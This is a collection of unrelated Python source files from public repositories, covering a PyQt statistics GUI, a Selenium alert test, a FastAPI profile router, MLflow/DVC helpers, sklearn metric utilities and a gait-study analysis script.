self.combobox[10].setFont(font31)
list_00 = ["Please select Distribution", "Beta_Distribution", "Cauchy_Distribution",
"F_Distribution", "Gamma_Distribution", "Laplace_Distribution", "Logistic_Distribution",
"Lomax_Distribution", "Lognorm_Distribution", "Normal_Distribution", "Rayleigh_Distribution"]
list_001 = ["Please fit Distribution", "Beta_Distribution", "Binomial_Distribution", "Cauchy_Distribution",
"F_Distribution", "Gamma_Distribution", "Laplace_Distribution", "Logistic_Distribution",
"Lomax_Distribution", "Lognorm_Distribution", "Normal_Distribution", "Rayleigh_Distribution"]
for i in list_00:
self.combobox[10].addItem(i)
for i in list_001:
self.combobox[9].addItem(i)
self.combobox[10].currentIndexChanged.connect(self.Select_onChange101)
self.le[10] = [QLineEdit() for i in range(2)]
self.label[10] = [QLabel()] + [QLabel(text) for text in [" ", "1. parameter:", "2. parameter:"]]
self.label[10][1].setFont(QFont('Sanserif', 15))
self.label[10][1].setStyleSheet("font:bold")
self.pb[10] = []
for i, j in zip(['Execute', 'Clear', 'Help', 'Fit'],
[self.Simulation, self.clear101, self.msg10, self.fit]):
self.pb[10].append(QPushButton(i))
self.pb[10][-1].clicked.connect(j)
for i in [self.combobox[10], self.combobox[9], *self.label[10][:2], gbox]:
layout.addWidget(i)
list_00 = [*self.label[10][2:], *self.le[10], *self.pb[10]]
list_01 = [1, 2, 1, 2, 2, 4, 1, 3]
list_02 = [0, 0, 1, 1, 2, 2, 2, 2]
for i in zip(list_00, list_01, list_02):
glayout.addWidget(*i)
self.stack[10].setLayout(layout)
def clear101(self, index=10):
for i in self.le[index]:
i.clear()
def Select_onChange101(self):
switcher = {
"Binomial_Distribution": ["binomial.svg", [200, 60], 'n={}\n' 'p={}'],
"Normal_Distribution": ["normal.svg", [200, 60], 'μ={}\n' 'σ²={}'],
"Poisson_Distribution": ["poisson.svg", [250, 70], 'λ={}'],
"Rayleigh_Distribution": ["rayleigh.svg", [250, 60], 'σ={}'],
"Beta_Distribution": ["Beta.svg", [200, 60], 'α={}\n' 'β={}'],
"F_Distribution": ["f.svg", [450, 350], 'd1={}\n' 'd2={}'],
"Gamma_Distribution": ["gamma2.svg", [300, 50], 'k={} θ={}'],
"Geometric_Distribution": ["geometric.svg", [290, 60], 'p={}'],
"Lognorm_Distribution": ["lognorm.svg", [250, 60], 'μ={}\n' 'σ={}'],
"Chi2_Distribution": ["chi2.svg", [300, 140], 'df={}'],
"Cauchy_Distribution": ["cauchy.svg", [350, 80], 'x0={}\n' 'γ={}'],
"Laplace_Distribution": ["laplace.svg", [200, 60], 'μ={}\n' 'λ={}'],
"T_Distribution": ["t.svg", [300, 90], 'v={}'],
"Expon_Distribution": ["exponential.svg", [200, 60], 'λ={}'],
"Weibull_Distribution": ["weibull.svg", [350, 80], 'λ={}\n' 'a={}'],
"Negative_Binomial_Distribution": ["negativ.svg", [300, 60], 'n={}\n' 'p={}'],
"Lomax_Distribution": ["lomax.svg", [250, 60], 'λ={}\n' 'α={}'],
"Logistic_Distribution": ["logistic.svg", [300, 170], 'μ={}\n' 's={}']
}
if self.combobox[10].currentText() == 'Please select Distribution':
self.label[10][0].setText(' ')
self.label[10][1].setText(' ')
elif self.combobox[10].currentText() == 'Zipf_Distribution':
self.label[10][0].setText('No pic')
self.label[10][0].setScaledContents(True)
self.label[10][0].setMaximumSize(200, 60)
self.label[10][1].setText('a={}')
else:
i = switcher.get(self.combobox[10].currentText(), None)
self.label[10][0].setPixmap(QPixmap(i[0]))
self.label[10][0].setScaledContents(True)
self.label[10][0].setMaximumSize(*i[1])
self.label[10][1].setText(i[2])
def msg10(self):
QMessageBox.about(self, "Help", "The simulator generates a probability distribution\n"
"which is then fitted to estimate its parameters.\n"
"Inputboxes support a sets of parameters like '4'")
def Simulation(self):
try:
a = 0
b = 0
a = float(self.le[10][0].text())
b = float(self.le[10][1].text())
switcher = {
# "Binomial_Distribution": Simulation_fit.getParament(a, b).binomial_P,
"Normal_Distribution": Simulation_fit.getParament(a, b).normal_P,
"Rayleigh_Distribution": Simulation_fit.getParament(a, b).rayleigh_P,
"Beta_Distribution": Simulation_fit.getParament(a, b).beta_P,
"F_Distribution": Simulation_fit.getParament(a, b).f_P,
"Gamma_Distribution": Simulation_fit.getParament(a, b).gamma_P,
"Lognorm_Distribution": Simulation_fit.getParament(a, b).lognorm_P,
"Cauchy_Distribution": Simulation_fit.getParament(a, b).cauchy_P,
"Laplace_Distribution": Simulation_fit.getParament(a, b).laplace_P,
"Lomax_Distribution": Simulation_fit.getParament(a, b).lomax_P,
"Logistic_Distribution": Simulation_fit.getParament(a, b).logistic_P
}
X = switcher.get(self.combobox[10].currentText(), lambda: None)()
fig = plt.figure()
Simulation_fit.fit_Funktion(X).Sim()
except:
self.Error()
def fit(self):
try:
a = 0
b = 0
a = float(self.le[10][0].text())
# print(a)
b = float(self.le[10][1].text())
# print(b)
switcher = {
# "Binomial_Distribution": Simulation_fit.getParament(a, b).binomial_P,
"Normal_Distribution": Simulation_fit.getParament(a, b).normal_P,
"Rayleigh_Distribution": Simulation_fit.getParament(a, b).rayleigh_P,
"Beta_Distribution": Simulation_fit.getParament(a, b).beta_P,
"F_Distribution": Simulation_fit.getParament(a, b).f_P,
"Gamma_Distribution": Simulation_fit.getParament(a, b).gamma_P,
"Lognorm_Distribution": Simulation_fit.getParament(a, b).lognorm_P,
"Cauchy_Distribution": Simulation_fit.getParament(a, b).cauchy_P,
"Laplace_Distribution": Simulation_fit.getParament(a, b).laplace_P,
"Lomax_Distribution": Simulation_fit.getParament(a, b).lomax_P,
"Logistic_Distribution": Simulation_fit.getParament(a, b).logistic_P
}
X = switcher.get(self.combobox[10].currentText(), lambda: None)()
fig = plt.figure()
switcher_new = {
"Binomial_Distribution": Simulation_fit.getParament(a, b).binomial_P,
"Normal_Distribution": Simulation_fit.fit_Funktion(X).normal_Fit,
"Rayleigh_Distribution": Simulation_fit.fit_Funktion(X).rayleigh_Fit,
"Beta_Distribution": Simulation_fit.fit_Funktion(X).beat_Fit,
"F_Distribution": Simulation_fit.fit_Funktion(X).f_Fit,
"Gamma_Distribution": Simulation_fit.fit_Funktion(X).gamma_Fit,
"Lognorm_Distribution": Simulation_fit.fit_Funktion(X).lognorm_Fit,
"Cauchy_Distribution": Simulation_fit.fit_Funktion(X).cauchy_Fit,
"Laplace_Distribution": Simulation_fit.fit_Funktion(X).laplace_Fit,
"Lomax_Distribution": Simulation_fit.fit_Funktion(X).lomax_Fit,
"Logistic_Distribution": Simulation_fit.fit_Funktion(X).logistic_Fit
}
switcher_new.get(self.combobox[9].currentText(), lambda: None)()
except:
self.Error()
'-------------------------confidence ellipse----------------------------------'
def stackUI11(self):
vlayout = QVBoxLayout(self.stack[11])
gridlayout = QGridLayout()
grid = QWidget()
grid.setLayout(gridlayout)
vlayout.addWidget(grid)
self.le[11] = [QLineEdit() for i in range(4)]
list_00 = ["pb1_1", "pb1_2", "pb1_3", "pb1_4", "help"]
list_01 = ["positive correlation", "negative correlation", "Weak correlation", "Clear", "Help"]
list_02 = [self.positive_correlation, self.negative_correlation, self.Weak_correlation,
self.clear111, self.msg11]
for i, j, k in zip(list_00, list_01, list_02):
self.var_dict[i] = QPushButton(j)
self.var_dict[i].clicked.connect(k)
for i, j in zip(["label11", "label12", "label13", "label14"], ["quantity:", "mu:", "scale", "std"]):
self.var_dict[i] = QLabel()
self.var_dict[i].setText(j)
list_03 = [self.var_dict["help"], self.var_dict["label11"], self.var_dict["label12"],
self.var_dict["label13"], self.var_dict["label14"], *self.le[11],
self.var_dict["pb1_1"], self.var_dict["pb1_2"], self.var_dict["pb1_3"], self.var_dict["pb1_4"]]
list_04 = [1, 2, 3, 4, 5, 2, 3, 4, 5, 2, 3, 4, 5]
list_05 = [2, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2]
for i in zip(list_03, list_04, list_05):
gridlayout.addWidget(*i)
def positive_correlation(self):
fig, ax_nstd = plt.subplots()
dependency_nstd = [[0.85, 0.35],
[0.15, -0.65]]
sp = [self.le[11][i].text().split(',') for i in range(4)]
try:
n = int(self.le[11][0].text())
mu = list(map(int, sp[1]))
scale = list(map(int, sp[2]))
std = list(map(int, sp[3]))
ax_nstd.axvline(c='grey', lw=1)
x, y = get_correlated_dataset(n, dependency_nstd, mu, scale)
ax_nstd.scatter(x, y, s=0.5)
for i in range(len(std)):
colors = ['r', 'g', 'b']
confidence_ellipse(x, y, ax_nstd, n_std=std[i],
label=r'$%s\sigma$' % std[i], edgecolor=colors[i])
ax_nstd.scatter(mu[0], mu[1], c='red', s=3)
ax_nstd.set_title('Positive Correlation:Different standard deviations')
ax_nstd.legend()
plt.show()
except:
self.Error()
def negative_correlation(self):
fig, ax_nstd = plt.subplots()
dependency_nstd = [[0.9, -0.4],
[0.1, -0.6]]
sp = [self.le[11][i].text().split(',') for i in range(4)]
try:
n = int(self.le[11][0].text())
mu = list(map(int, sp[1]))
scale = list(map(int, sp[2]))
std = list(map(int, sp[3]))
ax_nstd.axvline(c='grey', lw=1)
x, y = get_correlated_dataset(n, dependency_nstd, mu, scale)
ax_nstd.scatter(x, y, s=0.5)
for i in range(len(std)):
colors = ['r', 'g', 'b']
confidence_ellipse(x, y, ax_nstd, n_std=std[i],
label=r'$%s\sigma$' % std[i], edgecolor=colors[i])
ax_nstd.scatter(mu[0], mu[1], c='red', s=3)
ax_nstd.set_title('Negative Correlation:Different standard deviations')
ax_nstd.legend()
plt.show()
except:
self.Error()
def Weak_correlation(self):
fig, ax_nstd = plt.subplots()
dependency_nstd = [[1, 0],
[0, 1]]
sp = [self.le[11][i].text().split(',') for i in range(4)]
try:
n = int(self.le[11][0].text())
mu = list(map(int, sp[1]))
scale = list(map(int, sp[2]))
std = list(map(int, sp[3]))
ax_nstd.axvline(c='grey', lw=1)
x, y = get_correlated_dataset(n, dependency_nstd, mu, scale)
ax_nstd.scatter(x, y, s=0.5)
for i in range(len(std)):
colors = ['r', 'g', 'b']
confidence_ellipse(x, y, ax_nstd, n_std=std[i],
label=r'$%s\sigma$' % std[i], edgecolor=colors[i])
ax_nstd.scatter(mu[0], mu[1], c='red', s=3)
ax_nstd.set_title('Weak Correlation:Different standard deviations')
ax_nstd.legend()
plt.show()
except:
self.Error()
def clear111(self, index=11):
for i in self.le[index]:
i.clear()
def msg11(self):
QMessageBox.about(self, "Help", "The simulator generates confidence ellipses\n"
"quantity support a sets of parameters like '500'\n"
"Other inputboxes support multiple sets of parameters like '8,5'")
'-------------------------Waveforms----------------------------------'
def stackUI12(self):
layout = QVBoxLayout(self.stack[12])
gridlayout = QGridLayout()
grid = QWidget()
grid.setLayout(gridlayout)
layout.addWidget(grid)
self.le[12] = [QLineEdit() for i in range(3)]
self.combobox[12] = QComboBox()
font31 = QFont()
font31.setPointSize(12)
self.combobox[12].setFont(font31)
list_00 = ["Please select mode", "square125", "square25", "square50", "square75", "triangle", "noise"]
for i in list_00:
self.combobox[12].addItem(i)
layout.addWidget(self.combobox[12])
list_00 = ["pb1_1", "pb1_2", "pb1_3", "pb1_4", "help"]
list_01 = ["Execute", "Save", "Read", "Clear", "Help"]
list_02 = [self.wave_generation, self.save_wave, reafWave,
self.clear111, self.msg11]
for i, j, k in zip(list_00, list_01, list_02):
self.var_dict[i] = QPushButton(j)
self.var_dict[i].clicked.connect(k)
for i, j in zip(["label11", "label12", "label13"], ["Sample-rate:", "Frequency:", "Time-lengh"]):
self.var_dict[i] = QLabel()
self.var_dict[i].setText(j)
list_03 = [self.var_dict["help"], self.var_dict["label11"], self.var_dict["label12"],
self.var_dict["label13"], *self.le[12],
self.var_dict["pb1_1"], self.var_dict["pb1_2"], self.var_dict["pb1_3"], self.var_dict["pb1_4"]]
list_04 = [1, 3, 4, 5, 3, 4, 5, 2, 3, 4, 5]
list_05 = [2, 0, 0, 0, 1, 1, 1, 2, 2, 2, 2]
for i in zip(list_03, list_04, list_05):
gridlayout.addWidget(*i)
def wave_generation(self):
try:
fig = plt.figure()
sample_rate = int(self.le[12][0].text())
fa = int(self.le[12][1].text())
t_length = float(self.le[12][2].text())
mode = str(self.combobox[12].currentText())
y, t = createWave(sample_rate=sample_rate, fa=fa, t_length=t_length, mode=mode)
plt.plot(t, y)
plt.title("%s" % mode)
plt.show()
except:
self.Error()
def save_wave(self):
try:
fig = plt.figure()
sample_rate = int(self.le[12][0].text())
fa = int(self.le[12][1].text())
t_length = float(self.le[12][2].text())
mode = str(self.combobox[12].currentText())
y, t = createWave(sample_rate=sample_rate, fa=fa, t_length=t_length, mode=mode)
saveWave(y=y, sample_rate=sample_rate, path=r'wave.wav')
except:
self.Error()
if __name__ == "__main__":
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec_())
| lukascao/GUI_vorlesung | GUI_example.py | GUI_example.py | py | 54,545 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.Optional",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
... |
74649269864 | # -*- coding: utf-8 -*-
# @Project : selenium_event
# @File : test_alert.py
# @Software: PyCharm
# @Author : Lizhipeng
# @Email : 1907878011@qq.com
# @Time : 2021/9/26 17:16
from selenium.webdriver import ActionChains
from seleium_study.selenium_js.base import Base
class TestAlert(Base):
def test_alert(self):
self.driver.get('https://www.runoob.com/try/try.php?filename=jqueryui-api-droppable')
# 切换frame
self.driver.switch_to.frame('iframeResult')
top = self.driver.find_element_by_xpath('//*[@id="draggable"]')
end = self.driver.find_element_by_xpath('//*[@id="droppable"]')
# 拖拽元素top到元素end
action = ActionChains(self.driver)
action.drag_and_drop(top, end).perform()
# 焦点切换到弹出框上,点击弹出框上的确定
self.driver.switch_to.alert.accept()
# 切换回默认的frame
self.driver.switch_to.default_content()
self.driver.find_element_by_xpath('//*[@id="submitBTN"]').click()
| iospeng/python | pycharm_demo/selenium_event/seleium_study/selenium_file_alert/test_alert.py | test_alert.py | py | 1,036 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "seleium_study.selenium_js.base.Base",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.ActionChains",
"line_number": 21,
"usage_type": "call"
}
] |
40586478771 | from fastapi import APIRouter, Depends, status
from sqlalchemy.ext.asyncio import AsyncSession
from src.authentication import AuthModel, get_token_user
from src.core.exceptions import UnprocessableEntityException
from src.db.postgres import get_db
from .dependencies import get_token_parent
from .parents.crud import parent_crud
from .parents.models import ParentModel
from .parents.schemes import ResponseParentScheme, UpdateParentScheme
router = APIRouter()
@router.get(
path="/me",
summary="View a personal profile",
response_model=ResponseParentScheme,
)
async def watch_me(
parent: ParentModel = Depends(get_token_parent),
):
return parent
@router.patch(
path="/me",
summary="Update a personal profile",
response_description="Successful Response returns only status code 200",
)
async def update_me(
*,
db: AsyncSession = Depends(get_db),
parent: ParentModel = Depends(get_token_parent),
update_data: UpdateParentScheme,
):
update_data = update_data.dict(exclude_none=True)
if not update_data:
return None
_, err = await parent_crud.update(db, parent, update_data)
if err is not None:
raise UnprocessableEntityException(detail=err)
return None
@router.delete(
path="/me",
summary="Delete a personal profile",
status_code=status.HTTP_204_NO_CONTENT,
response_description="Successful Response returns only status code 204",
)
async def delete_me(
db: AsyncSession = Depends(get_db),
auth_user: AuthModel = Depends(get_token_user),
):
await parent_crud.delete_auth(db, auth_user.email)
return None
| Xewus/KidEdVisor | backend/src/parents/router.py | router.py | py | 1,626 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "parents.models.ParentModel",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "fastapi.Depends",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "dependen... |
35183490035 | import asyncio
import os
import oneai
from oneai import Input, Output
oneai.api_key = os.getenv("ONEAI_KEY")
async def split(filepath):
pipeline = oneai.Pipeline(
steps=[
oneai.skills.SplitByTopic(),
]
)
with open(filepath, 'r') as file_input:
output = await pipeline.run_batch_async([file_input], on_output=handle_success, on_error=handle_error)
print(f'OUTPUT = {output}')
def handle_success(input, output_map: [Input, Output]) -> None:
print(f'success: spans = ')
for span in output_map.segments.output_spans:
print(span)
def handle_error(input, output_map: [Input, Exception]) -> None:
print(f'failure: {output_map}')
asyncio.run(split('file_store/Auburn.txt'))
# asyncio.run(split('file_store/1_min_sample.mp3.txt'))
| clande/demo | oneai_splitbytopic_repro.py | oneai_splitbytopic_repro.py | py | 808 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "oneai.api_key",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.getenv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "oneai.Pipeline",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "oneai.skills.SplitByTopic",... |
17579968573 | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from numpy import *
import sys
file_name = sys.argv[1]
data1 = loadtxt("./" + file_name)
NUM=data1[:,0] #
TIME=data1[:,1] #
fig = plt.figure() #
top = fig.add_subplot(111) # 1 riga, 1 colonna, figura 1
top.set_title('BRUTE FORCE')
top.grid()
top.set_xlabel('n')
top.set_ylabel('time')
top.plot(NUM, TIME)
#top.text(200,35,"Steps: "+str(int(STEPS)))
plt.savefig('fatt-brute-force.pdf')
#plt.show()
| UnProgrammatore/CCQ | altre_cose/fattorizzazione_mpi_banale_print/plot.py | plot.py | py | 480 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot... |
12676975577 | import mlflow
import dvc.api
import pandas as pd
def yield_artifacts(run_id, path=None):
"""Yield all artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
for item in client.list_artifacts(run_id, path):
if item.is_dir:
yield from yield_artifacts(run_id, item.path)
else:
yield item.path
def fetch_logged_data(run_id):
"""Fetch params, metrics, tags, and artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
data = client.get_run(run_id).data
# Exclude system tags: https://www.mlflow.org/docs/latest/tracking.html#system-tags
tags = {k: v for k, v in data.tags.items() if not k.startswith("mlflow.")}
artifacts = list(yield_artifacts(run_id))
return {
"params": data.params,
"metrics": data.metrics,
"tags": tags,
"artifacts": artifacts,
}
def dvc_open(path, url, branch):
with dvc.api.open(
path = path, ## 데이터 경로
repo = url, ## github repo 경로,
rev = branch ## 현재는 branch 기준
) as f:
return pd.read_csv(f, sep=",")
def find_experiment_id(experiment_name):
current_experiment = dict(mlflow.get_experiment_by_name(experiment_name))
return current_experiment["experiment_id"]
| robert-min/bike_share_mlflow | model/utils.py | utils.py | py | 1,317 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mlflow.tracking.MlflowClient",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "mlflow.tracking",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "mlflow.tracking.MlflowClient",
"line_number": 18,
"usage_type": "call"
},
{
"api_... |
27770003302 | import numpy as np
import pandas as pd
import matplotlib
import metrics
import sklearn
import xgboost
from sklearn import metrics
from decimal import *
import graphviz
'''
新細明體:PMingLiU
細明體:MingLiU
標楷體:DFKai-SB
黑体:SimHei
宋体:SimSun
新宋体:NSimSun
仿宋:FangSong
楷体:KaiTi
仿宋_GB2312:FangSong_GB2312
楷体_GB2312:KaiTi_GB2312
微軟正黑體:Microsoft JhengHei
微软雅黑体:Microsoft YaHei
————————————————
metrics.confusion_matrix(y_true, y_pred, labels=None, sample_weight=None)
metrics.accuracy_score(y_true,y_pred)
metrics.average_precision_score(y_true, y_score, average='macro', sample_weight=None)
metrics.precision_score(y_true, y_pred, labels=None, pos_label=1, average='binary',)
metrics.recall_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
metrics.f1_score(y_true, y_pred, labels=None, pos_label=1, average='binary', sample_weight=None)
precision,recall,thresholds=metrics.precision_recall_curve(y_true,y_pred)
>>> plt.plot(recall, precision)
fpr,tpr,thresholds = metrics.roc_curve(y_true, y_ pred, pos_label=None, sample_weight=None, drop_intermediate=True)
>>> plt.plot(fpr,tpr)
metrics.roc_auc_score(y_true, y_pred, average='macro', sample_weight=None)
metrics.auc(fpr, tpr)
metrics.mean_absolute_error(y_true, y_pred, sample_weight=none, multioutput='uniform_average')
metrics.mean_squared_error(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
metrics.r2_score(y_true, y_pred, sample_weight=None, multioutput='uniform_average')
用于多分类,只有两个属性可以选择 ‘macro’ 和 ‘weighted’
' macro ':计算每个标签的指标,并计算它们的未加权平均值。不考虑样本类别是否平衡。
' weighted ':计算每个标签的指标,并找到它们的平均值,对(每个标签的真实实例的数量)进行加权。
'micro':整体计算TP、FN、FP,然后根据公式计算得分。
'''
def classificationModel(y_true,y_pred):
nameValueDict={}
#混淆矩阵
confusionMatrix = metrics.confusion_matrix(y_true, y_pred)
#准确率
accuracyScore = metrics.accuracy_score(y_true, y_pred)
#精确率
precisionScore = metrics.precision_score(y_true, y_pred,average=None)
#召回率
recallScore = metrics.recall_score(y_true, y_pred,average=None)
#f1 只对2分类问题有效
# None, 'micro', 'macro', 'weighted'
f1Score = metrics.f1_score(y_true, y_pred,average=None)
nameValueDict.update({})
#pr曲线
precision,recall,thresholds = metrics.precision_recall_curve(y_true,y_pred)
matplotlib.plt.plot(recall, precision)
fpr, tpr, thresholds = metrics.roc_curve(y_true, y_pred,drop_intermediate = True)
# >> > plt.plot(fpr, tpr)
rocAucScore = metrics.roc_auc_score(y_true, y_pred)
aucArea = metrics.auc(fpr, tpr)
nameValueDict.update({'accuracyScore':accuracyScore})
nameValueDict.update({'precisionScore':precisionScore})
nameValueDict.update({'recallScore':recallScore})
# nameValueDict.update({'f1Score':f1Score})
nameValueDict.update({'auc':metrics.auc(fpr, tpr)})
nameValueDict.update({'accuracyScore':accuracyScore})
nameValueDict.update({'aucArea':aucArea})
return nameValueDict
def regressionModel(y_true,y_pred):
nameValueDict = {}
MAE = metrics.mean_absolute_error(y_true, y_pred)
MSE = metrics.mean_squared_error(y_true, y_pred)
r2 = metrics.r2_score(y_true, y_pred)
nameValueDict.update({'MAE':MAE})
nameValueDict.update({'MSE':MSE})
nameValueDict.update({'r2':r2})
return nameValueDict
def entU(u):
return [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
#条件熵
def uConditionV(u,v):
entu = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u, return_counts=True)[1]]][0]
entv = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(v, return_counts=True)[1]]][0]
# v 解释变量
vid, vct = np.unique(v, return_counts=True)
# 条件信息
vidEntropy = [np.sum([p * np.log2(1 / p) for p in ct / np.sum(ct)]) for ct in [np.unique(u[v == i], return_counts=True)[1] for i in vid]]
#条件熵
entUconditonV= np.sum(np.array(vidEntropy) * (vct / np.sum(vct)))
return entUconditonV
#信息增益
def gainuv(u,v):
return entU(u) - uConditionV(u,v)
def gainRatio(u, v):
return gainuv(u,v) / entU((v))
def display_version():
print('np.version : ',np.__version__)
print('pd.version : ',pd.__version__)
print('matplotlib.version : ',matplotlib.__version__)
print('sklearn.version : ',sklearn.__version__)
print('xgboost.version : ',xgboost.__version__)
print('graphviz.version',graphviz.__version__)
display_version()
#数据查看tool
def overview(data):
print('\n======================= data overview =======================\n')
print('\n重复行数 : ',data.duplicated().sum(axis=0))
print('重复记录为:')
print(data[data.duplicated()])
print('\n数据总体缺失情况 : ')
print('总记录数 : ',data.shape[0])
print('\n各列没有缺失的样本数量:')
print(data.notnull().sum())
print('\n各列缺失的样本数量:')
print(data.isnull().sum())
print('\n各列缺失比例')
print(data.isnull().mean())
print('\n缺失行\n')
print(data.loc[data.isnull().sum(axis=1)>0,:])
print('\n缺失列\n')
print(data.loc[:,data.isnull().sum(axis=0)>0])
print('\n缺失区域【缺失行+缺失列】\n')
print(data.loc[data.isnull().sum(axis=1) > 0, data.isnull().sum(axis=0) > 0])
print('\n\n')
print('\n所在列及缺失的行索引号\n')
for i in data.columns:
print(i,' : ',list(np.where(pd.isna(data[i]))[0]))
print('\n\n')
def basicOperate(data):
print('\n\n')
print('\n删除重复行\n')
data.drop_duplicates(inplace=True)
print('\n\n')
print('\n\n')
print('\n\n')
def dropRank(data,thresh):
threshold = thresh
print('显示空值个数大于 {} 的行,这些行,予以删除'.format(data.shape[1] - threshold))
print(data.loc[data.isnull().sum(axis=1) > data.shape[1] - threshold])
print('=======================================')
print(data.loc[data.isnull().sum(axis=1) == data.shape[1] - threshold])
print('=======================================')
print('显示非空个数大于等于 {} 的行,这些行,予以保留'.format(threshold))
print(data.dropna(thresh=threshold))
data.dropna(thresh=threshold,inplace=True)
# 离散型 gini系数 x是自变量,y是flag
def giniC(x, y):
x_id, x_ct = np.unique(x, return_counts=True)
p_x = [ct / sum(ct) for ct in [np.unique(x, return_counts=True)[1]]]
gini = [1 - np.sum(p ** 2) for p in
[ct / sum(ct) for ct in [np.unique(y[x == i], return_counts=True)[1] for i in x_id]]]
return np.sum(np.array(p_x) * np.array(gini))
# 连续型 gini系数 x是自变量,y是flag
def giniS(y, x):
# 将离散数据转成float
x.astype(float)
# 对离散数据排序
sorted_x = np.sort(x)
split_point_list = []
split_point_gini = []
# 求分界点
for i in range(0, len(sorted_x) - 1, 1):
split_point_list.append(np.mean([sorted_x[i], sorted_x[i + 1]]))
# 依次计算每个分界点分割后的gini系数
for i in split_point_list:
# 分界后,就是二分类了
xi = pd.Series.copy(x)
xi[xi <= i] = 0
xi[xi > i] = 1
# 根据新分界点,计算权重(频数、概率)
w_i = [[p for p in ct / np.sum(ct)] for ct in [np.unique(xi, return_counts=True)[1]]]
# 分类
x_id, x_ct = np.unique(xi, return_counts=True)
# 每个分界点分类的gini
gini_x_id = [np.sum([(p - p ** 2) for p in ct / np.sum(ct)]) for ct in
[np.unique(y[xi == i], return_counts=True)[1] for i in x_id]]
# 计算每个分界点的gini
gini = Decimal(str(np.sum(w_i * np.array(gini_x_id)))).quantize(Decimal('0.0000'),ROUND_HALF_UP)
split_point_gini.append(gini)
# 封装成字典
split_point_gini_dict = dict(zip(split_point_list, split_point_gini))
return split_point_gini_dict
| kshsky/PycharmProjects | machinelearning/tools/mlTools.py | mlTools.py | py | 8,384 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.metrics.confusion_matrix",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "sklearn.metrics.accuracy_score",
"line_number": 57,
"usage_type": "call"
},
{
"a... |
37986696093 | """
This script is written to do analysis on GA study
"""
# import libraries
import re
import tsfresh
import numpy as np
import pandas as pd
from pandas import ExcelWriter
from sklearn.preprocessing import LabelBinarizer
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("darkgrid")
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedShuffleSplit, train_test_split
from ml_models.LinearRegression import LinearRegressionCalculator
from ml_models.DecisionTreeRegression import DecisionTreeRegressionCalculator
from ml_models.RandomForestRegression import RandomForestRegressionCalculator
# import methods from other scripts / packages
from storage.DataLoader import data_loader
from feature_extraction.FFT import fft_extractor
from feature_extraction.abs_energy import AbsoluteEnergyCalculator
# Constant declarations
col_names = ['Time_sec', 'Sens_L1', 'Sens_L2', 'Sens_L3', 'Sens_L4', 'Sens_L5', 'Sens_L6', 'Sens_L7', 'Sens_L8',
'Sens_R1', 'Sens_R2', 'Sens_R3', 'Sens_R4', 'Sens_R5', 'Sens_R6', 'Sens_R7', 'Sens_R8', 'TF_L', 'TF_R']
"""
Main Controller
"""
def study_ga_controller(demographics_data):
group_1_data, group_2_data = split_group_data(demographics_data)
group_1_analysis(group_1_data, group_2_data)
# group_2_analysis(group_2_data)
def split_group_data(demographics_data):
group_1_data = demographics_data[demographics_data['Group'] == 1]
group_2_data = demographics_data[demographics_data['Group'] == 2]
return group_1_data, group_2_data
def print_newline():
print("")
def print_seperator():
print("--------------------------")
# ----------------------------------------------------- GROUP 1 ------------------------------------------------------ #
def group_1_analysis(group_1_data, group_2_data):
print_newline()
print("#####################################")
print("Group 1 Analysis:")
print("#####################################")
# Create Empty Dataframe
all_patient_dataframe = pd.DataFrame(
columns=['ID', 'Patient_Number', 'Study', 'Patient_Type', 'Foot', 'file_number', 'Median', 'Max', 'Min', 'Skewness', 'Std', 'Variance', 'Abs_Energy',
'coeff_1', 'coeff_2', 'coeff_3', 'coeff_4'])
df1 = pd.DataFrame([[np.nan] * len(all_patient_dataframe.columns)], columns=all_patient_dataframe.columns)
patient_data_loader = data_loader()
patient_data_file_paths = patient_data_loader.get_patient_file_paths()
group_1_2_data = group_1_data[['ID', 'Gender', 'HoehnYahr']].append(group_2_data[['ID', 'Gender', 'HoehnYahr']])
# all_patient_dataframe = GenerateAllPatientDataframe(patient_data_loader, patient_data_file_paths, all_patient_dataframe, df1)
# all_patient_dataframe = pd.merge(all_patient_dataframe, group_1_2_data, how='left', on=['ID'])
# writer = ExcelWriter('Study_Ga_df.xlsx')
# all_patient_dataframe.to_excel(writer, 'Sheet1')
# writer.save()
all_patient_dataframe = pd.read_excel('Study_Ga_df.xlsx', sheet_name="Sheet1")
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
